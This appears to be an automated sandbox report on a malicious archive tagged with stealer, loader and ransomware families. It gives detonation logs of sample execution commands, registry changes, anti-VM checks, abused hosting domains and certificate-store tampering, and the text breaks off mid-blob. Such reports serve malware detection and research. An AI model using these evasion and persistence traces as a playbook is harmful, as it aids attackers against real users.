Malware Analysis Report

2024-11-13 18:56

Sample ID 240223-wbr3dafc21
Target file_release_4.rar
SHA256 e3683f1a58054c1166a94d5758848ed053777c7dc575a7af69c938b39f204eb5
Tags
glupteba risepro smokeloader stealc zgrat pub3 backdoor dropper evasion loader rat spyware stealer trojan upx djvu lumma discovery persistence ransomware themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e3683f1a58054c1166a94d5758848ed053777c7dc575a7af69c938b39f204eb5

Threat Level: Known bad

The file file_release_4.rar was found to be: Known bad.

Malicious Activity Summary

glupteba risepro smokeloader stealc zgrat pub3 backdoor dropper evasion loader rat spyware stealer trojan upx djvu lumma discovery persistence ransomware themida

Detected Djvu ransomware

ZGRat

Glupteba payload

Detect ZGRat V1

Lumma Stealer

Djvu Ransomware

SmokeLoader

RisePro

Stealc

Glupteba

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Modifies Windows Firewall

Modifies file permissions

Identifies Wine through registry keys

Unexpected DNS network traffic destination

Reads data files stored by FTP clients

Drops startup file

Executes dropped EXE

Checks computer location settings

UPX packed file

Loads dropped DLL

Checks BIOS information in registry

Themida packer

Reads user/profile data of web browsers

Drops Chrome extension

Legitimate hosting services abused for malware hosting/C2

Checks whether UAC is enabled

Checks installed software on the system

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Suspicious use of SetThreadContext

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Launches sc.exe

Unsigned PE

Program crash

Enumerates physical storage devices

Checks processor information in registry

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Checks SCSI registry key(s)

Suspicious behavior: MapViewOfSection

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-23 17:45

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:48

Platform

win7-20240220-en

Max time kernel

120s

Max time network

125s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

Signatures

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "MIBLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID\ = "ICQLiteShell.MCLiteShellExt.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods\ = "3" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "PSFactoryBuffer" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods\ = "7" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ThreadingModel = "Both" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ = "IMCLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\ = "ICQLiteShell 1.0 Type Library" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID\ = "ICQLiteShell.MCLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer\ = "ICQLiteShell.MCLiteShellExt.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS\ = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib\ = "{346F8AC1-CEB1-4E3E-944B-87D9840505C3}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2860 wrote to memory of 2280 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2860 wrote to memory of 2280 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2860 wrote to memory of 2280 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2860 wrote to memory of 2280 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2860 wrote to memory of 2280 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2860 wrote to memory of 2280 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2860 wrote to memory of 2280 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:48

Platform

win10v2004-20240221-en

Max time kernel

148s

Max time network

156s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 212 wrote to memory of 2352 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 212 wrote to memory of 2352 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 212 wrote to memory of 2352 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2352 -ip 2352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 600

Network

Country Destination Domain Proto
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 187.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 185.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 90.65.42.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:49

Platform

win7-20240221-en

Max time kernel

31s

Max time network

162s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RisePro

stealer risepro

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

ZGRat

rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eeb